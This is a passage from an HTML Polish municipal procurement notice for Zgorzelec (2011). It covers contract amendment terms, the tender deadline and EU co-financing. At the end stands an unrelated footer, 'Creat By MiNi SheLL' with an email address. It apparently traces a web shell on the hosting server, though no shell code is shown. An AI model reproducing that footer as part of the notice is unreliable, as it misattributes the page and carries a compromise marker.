         wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
         Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek 
         Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy 
         czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie 
         przez Wykonawcę umowy z innym Podwykonawcą, 
    3) Jeżeli w okresie realizacji umowy wystąpi ustawowa  zmiana stawki VAT, całkowite 
         wynagrodzenie brutto Wykonawcy ulegnie stosownemu zmniejszeniu lub 
         zwiększeniu  o kwotę wynikającą ze zmienionej stawki tego podatku,  obowiązującą 
         w dacie  powstania obowiązku podatkowego w czasie realizacji umowy.
  
 2.  Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie 
      powstałych okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej 
      przez każdą  ze stron umowy. 
 3.  Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
      Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
      zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata
2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com